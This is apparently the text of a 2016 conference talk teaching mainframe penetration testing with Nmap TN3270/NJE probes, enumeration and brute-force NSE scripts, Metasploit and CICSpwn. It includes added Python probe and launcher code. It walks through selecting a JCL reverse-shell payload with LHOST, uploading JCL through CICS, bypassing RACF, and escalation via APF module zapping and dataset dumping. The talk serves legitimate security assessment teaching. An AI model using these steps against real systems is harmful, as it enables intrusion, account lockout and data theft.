VANGUARD SECURITY & COMPLIANCE 2016
Philip Young
ZedSec 390
CST08
Advanced Mainframe Hacking
SECURITY & COMPLIANCE CONFERENCE 2016
Disclaimer
I’m not here in the name of or on behalf of my employer. All opinions expressed here are my own.
Trademarks
The following are trademarks or registered trademarks of the International Business Machines Corporation:
CICS, CICSPlex, DB2, eServer, IBM, IBM z, IBM z Systems, IBM z13, IMS, MQSeries, MVS, NetView, OS/390, Parallel Sysplex, RACF, RMF, S/390, System z, System z9, System z10, System/390, VTAM, WebSphere, z Systems, z9, z10, z13, z/Architecture, z/OS, z/VM, zEnterprise
Java and all Java-based trademarks are trademarks of Oracle and/or its affiliates.
UNIX is a registered trademark of The Open Group in the United States and other countries.
Microsoft, Windows and Windows NT are registered trademarks of Microsoft Corporation.
Linux® is the registered trademark of Linus Torvalds in the U.S. and other countries.
Kali Linux is a trademark of Offensive Security.
macOS is a trademark of Apple Inc.
Metasploit is a registered trademark of Rapid7 LLC.
VMware is a registered trademark of VMware, Inc.
Other company, product and service names may be trademarks or service marks of others.
Purpose
This session will:
• Go over the tools introduced in yesterday's keynote
• Explain what is going on behind the scenes
• Show you how to use the tools
Tools Covered
• Nmap
• Metasploit
• CICSpwn
• Python (NJE/TN3270 Library)
• John the Ripper
• BIRP
Kali Linux
• A Linux distribution built for penetration testing
• Comes pre-loaded with multiple tools:
• Burp Suite
• Metasploit
• BeEF
• Many more
Nmap
• Network Mapper
• Uses various techniques to discover open ports
• e.g. the SYN scan (half-open scan)
Service Probes
• Identify what is running on a port
• Uses TCP/UDP probes
Nmap
• Created in 1997
• By Gordon Lyon (Fyodor)
• Written mostly in C and C++
• Includes service detection
• Added the Nmap Scripting Engine (NSE) in 2007
Nmap Probes
• Use the flag: '-sV'
• Null Probe:
Nmap sends nothing and matches the banner the service sends on its own
• Approx 4,000 match lines belong to the 'Null Probe'
Let's look at the TN3270 match line (line 4606 in nmap-service-probes at the time of this talk):
match tn3270 m|^\xff\xfd\x1d| p/IBM Telnet TN3270/ i/3270-REGIME/
TN3270 Null Probe
match -> 'Match the following'
tn3270 -> 'and report the service as tn3270'
m|^\xff\xfd\x1d| -> regular expression applied to the banner
\xff\xfd\x1d = IAC DO 3270-REGIME (Telnet option 29), which is why the match line carries i/3270-REGIME/
(TN3270E is Telnet option 40, so a server that opens with \xff\xfd\x28 is negotiating TN3270E, not this match)
p/IBM Telnet TN3270/ = Set the product field to 'IBM Telnet TN3270'
Other Probes
• TCP Probes
• Send data, inspect the reply
• For example, the Network Job Entry (NJE) probe:
NJE Probe
• Sends a deliberately invalid NJE 'OPEN' record
• Waits for either 'ACK' or 'NAK' in EBCDIC; a NAK is the expected answer to a bad OPEN, and either reply is enough to identify NJE on the port
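The two probe types on the last few slides (the TN3270 null-probe match and the active NJE OPEN probe), as an added Python example that is not code from the slides or from Nmap. The OPEN record layout (TYPE, RHOST, RIP, OHOST, OIP, R; 33 bytes) follows the JES2 NJE-over-TCP/IP connection record; the dummy node names, the zeroed IP fields, the NJE port default and the sample replies are assumptions constructed for this example.

```python
"""
Added example (not from the slides or from Nmap): a small model of the two
service-probe types described above.

1. TN3270 NULL probe: Nmap sends nothing and matches what the service sends
   first. A 3270 Telnet server opens with Telnet option negotiation
   IAC DO <option>; option 0x1d is 3270-REGIME (the match line the slide
   quotes) and option 0x28 is TN3270E.
2. NJE probe: Nmap sends a deliberately invalid NJE OPEN record and accepts
   either an EBCDIC "ACK" or "NAK" as proof that NJE is listening.
"""
import socket

IAC, DO = 0xFF, 0xFD
NJE_PORT = 175          # assumed default; NJE over TCP/IP is commonly on 175


def match_tn3270_banner(banner: bytes):
    """Emulate the nmap-service-probes NULL-probe match for tn3270.
    Returns (product, info) like Nmap's p/.../ and i/.../ fields, or None."""
    if len(banner) < 3 or banner[0] != IAC or banner[1] != DO:
        return None
    option = banner[2]
    if option == 0x1D:
        return ("IBM Telnet TN3270", "3270-REGIME")
    if option == 0x28:
        return ("IBM Telnet TN3270E", "TN3270E")
    return None         # some other Telnet option first, or not Telnet at all


def ebcdic(text: str) -> bytes:
    """EBCDIC (code page 037) encoding of an ASCII string."""
    return text.encode("cp037")


def nje_open_record(rhost: str = "FAKE", ohost: str = "FAKE") -> bytes:
    """Build an NJE OPEN record. Text fields are EBCDIC, space-padded (0x40).
    The IP fields are left zero, which makes the request invalid on purpose:
    a real peer will NAK it, and the NAK is all the probe needs."""
    rec = ebcdic("OPEN".ljust(8))                 # TYPE
    rec += ebcdic(rhost.upper()[:8].ljust(8))     # RHOST: node name we claim
    rec += b"\x00" * 4                            # RIP:   our IP (zeroed)
    rec += ebcdic(ohost.upper()[:8].ljust(8))     # OHOST: node we talk to
    rec += b"\x00" * 4                            # OIP:   its IP (zeroed)
    rec += b"\x00"                                # R:     reason/flags byte
    assert len(rec) == 33
    return rec


def classify_nje_reply(data: bytes):
    """Return 'ACK', 'NAK' or None depending on how the reply record starts."""
    if len(data) < 3:
        return None
    head = data[:3].decode("cp037", errors="replace")
    return head if head in ("ACK", "NAK") else None


def probe_nje(host: str, port: int = NJE_PORT, timeout: float = 5.0):
    """Active probe against a live host: send OPEN, classify the reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(nje_open_record())
        return classify_nje_reply(s.recv(64))


def probe_tn3270(host: str, port: int = 23, timeout: float = 5.0):
    """NULL probe against a live host: read the banner without sending first."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return match_tn3270_banner(s.recv(16))


# Constructed sample traffic (not captured from a real system).
SAMPLE_TN3270_BANNER = b"\xff\xfd\x1d"                    # IAC DO 3270-REGIME
SAMPLE_TN3270E_BANNER = b"\xff\xfd\x28"                   # IAC DO TN3270E
SAMPLE_NJE_NAK = ebcdic("NAK".ljust(8)) + b"\x00" * 25    # NAK to our bad OPEN

if __name__ == "__main__":
    print(match_tn3270_banner(SAMPLE_TN3270_BANNER))
    print(nje_open_record().hex())
    print(classify_nje_reply(SAMPLE_NJE_NAK))
```

The offline path (the constructed samples) is what the test exercises; `probe_nje` and `probe_tn3270` are the same logic wired to a socket for use against a real LPAR.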
Nmap Scripting Engine (NSE)
• Composed of libraries and scripts
• Over 530 scripts available
• 121 libraries
• Uses Lua
NSE Categories
AUTH
BROADCAST
BRUTE
DEFAULT
DISCOVERY
DOS
EXPLOIT
EXTERNAL
FUZZER
INTRUSIVE
MALWARE
SAFE
VERSION
VULN
TN3270 NSE Library
• A 'virtual' TN3270 terminal written in Lua
• Available: https://github.com/zedsec390/NMAP
• Allows for the following:
Invoke
• To invoke scripts use the --script flag (the trailing \ is a shell line continuation):
nmap -sV \
--script tn3270-screen <target>
Additional TN3270 Scripts
• VTAM® Applid Enumeration
• TSO:
• User ID Enumeration
• Password Brute Force
• CICS®:
• Transaction Enumeration
• User ID Enumeration
• User Password Brute Forcing
Caveat: the password brute-forcing scripts count against RACF's failed-logon threshold, so they can revoke every user ID in your list; enumeration scripts only test whether an ID exists.
TSO User Enumeration
• Let's walk through the arguments
• Note the libraries the script uses: brute & unpwdb
Argument                      Definition
brute.maxthreads=100          Maximum number of concurrent connections (100 here).
userdb='/tmp/users.txt'       File of user IDs to test, one per line.
tso-enum.commands='TSOL5'     Command typed at the VTAM screen to reach the TSO logon panel.
CICS Transaction Enumeration
Argument                      Definition
brute.maxthreads=100          Maximum number of concurrent connections (100 here).
idlist='/tmp/users.txt'       File of CICS transaction IDs to test, one per line.
cics-enum.commands='CICSTS29' Command typed at the VTAM screen to reach the CICS region.
cics-enum.path='/home/test'   Folder where a screenshot of each successfully identified transaction is written.
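A small launcher for the two enumeration scripts whose arguments are tabled above (tso-enum and cics-enum, the script names being the prefixes of the arguments), as an added Python example that is neither the slides' code nor part of the zedsec390/NMAP repository. It cleans the wordlist before nmap ever sees it and assembles the single comma-separated --script-args string that nmap expects. Port 23, the 192.0.2.x addresses and the sample wordlist are assumptions constructed for the example.

```python
"""
Added example (not from the slides or the zedsec390/NMAP scripts): assemble
and sanity-check the nmap invocations for tso-enum and cics-enum.
"""
import os
import shlex
import subprocess
import tempfile

# Length limits the target enforces: a TSO user ID is at most 7 characters,
# a CICS transaction ID at most 4. Longer entries can never match and only
# burn connections (and, with the brute scripts, failed-logon counters).
TSO_USER_MAXLEN = 7
CICS_TRAN_MAXLEN = 4


def load_ids(path, maxlen):
    """Read a wordlist; uppercase it (mainframe IDs are uppercase), drop
    blanks, duplicates and entries too long to be valid on the target."""
    seen, out = set(), []
    with open(path) as f:
        for line in f:
            w = line.strip().upper()
            if not w or len(w) > maxlen or w in seen:
                continue
            seen.add(w)
            out.append(w)
    return out


def write_clean_list(ids, suffix):
    """Write IDs to a temp file, one per line, and return its path."""
    fd, p = tempfile.mkstemp(suffix=suffix)
    with os.fdopen(fd, "w") as f:
        f.write("\n".join(ids) + "\n")
    return p


def script_args(pairs):
    """nmap takes ONE comma-separated --script-args string. Values containing
    the characters nmap itself treats specially would need its quoting rules,
    so refuse them rather than produce a command that silently misparses."""
    for k, v in pairs:
        if any(c in str(v) for c in ",{}= "):
            raise ValueError(f"{k}: value {v!r} would need quoting")
    return ",".join(f"{k}={v}" for k, v in pairs)


def tso_enum_cmd(target, userdb, command="TSOL5", port=23, maxthreads=100):
    pairs = [("brute.maxthreads", maxthreads), ("userdb", userdb),
             ("tso-enum.commands", command)]
    return ["nmap", "-sV", "-p", str(port), "--script", "tso-enum",
            "--script-args", script_args(pairs), target]


def cics_enum_cmd(target, idlist, command="CICSTS29", path="/home/test",
                  port=23, maxthreads=100):
    pairs = [("brute.maxthreads", maxthreads), ("idlist", idlist),
             ("cics-enum.commands", command), ("cics-enum.path", path)]
    return ["nmap", "-sV", "-p", str(port), "--script", "cics-enum",
            "--script-args", script_args(pairs), target]


def run(argv, dry_run=True):
    """Return the shell-quoted command line, or nmap's stdout if dry_run=False."""
    if dry_run:
        return shlex.join(argv)
    return subprocess.run(argv, capture_output=True, text=True, check=False).stdout


# Constructed sample wordlist (not real data) so the example runs offline.
SAMPLE_IDS = ["ibmuser", "SYS1", "ibmuser", "", "toolongforTSO", "cemt"]

if __name__ == "__main__":
    raw = write_clean_list(SAMPLE_IDS, ".raw")
    users = write_clean_list(load_ids(raw, TSO_USER_MAXLEN), ".users")
    trans = write_clean_list(load_ids(raw, CICS_TRAN_MAXLEN), ".trans")
    print(run(tso_enum_cmd("192.0.2.10", users)))
    print(run(cics_enum_cmd("192.0.2.10", trans)))
```

Lower `maxthreads` before pointing this at a production LPAR: 100 parallel TN3270 sessions is a noticeable load on VTAM, and the same wordlist fed to the brute scripts instead of the enum scripts will revoke accounts.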
Metasploit Framework
• Developed by H.D. Moore in 2003
• Moved to Ruby in 2007
• Created an easy-to-use exploit platform
• Chad Rikansrud (@bigendiansmalls) added JCL payloads and z/OS® architecture support in 2016
Using MSF
• Run 'msfconsole'
• To list all exploits: show exploits
• Run the only z/OS 'exploit' module (as of this talk): use exploit/mainframe/ftp/ftp_jcl_creds
• Show the options with: show options
• Fill in the options you need
• Select which 'payload' you want to use
Set options
• Exploit options:
Option    Definition
FTPUSER   User ID to use.
FTPPASS   Password to use.
RHOST     Hostname/IP address of the target LPAR's FTP server.
RPORT     FTP port (find it with Nmap).
Metasploit Payload Options
Now select a payload: set payload cmd/mainframe/reverse_shell_jcl
Change the payload options:
Option    Definition
LHOST     Our hostname or IP address (where the reverse shell connects back to).
LPORT     The port you want Metasploit to open a listener on.
CICSpwn
• Released this year (2016) by Ayoul3
• Relies on the CEMT/CEDA transaction IDs being reachable (for now)
• Uses CEMT to upload and execute JCL/REXX
• Can be used to assess CICS and to break into environments
• Requires Python 2.7
Interesting Options
Invoke with: python cicspwn.py
Flag       Definition
-i         Gather information about the region.
-A         Test all options.
-s         Upload JCL to be executed under the CICS region's user ID (requires CEMT).
--bypass   Attempt to bypass RACF® checks if CEDA is available.
Escalation
• So far only network based
• What happens after access is granted?
Some Ideas
• Storage 'scrapers' to gather system information (think 'IPLINFO', but built into Metasploit)
• Automated APF tools to attempt privilege escalation by zapping APF-authorized modules
• Data-dumping tools to grab all datasets
• SMP/E corruption
Why Not?
• Make your own tools?
I’d prefer the tools come with what the experts need, so they have it without knowing about it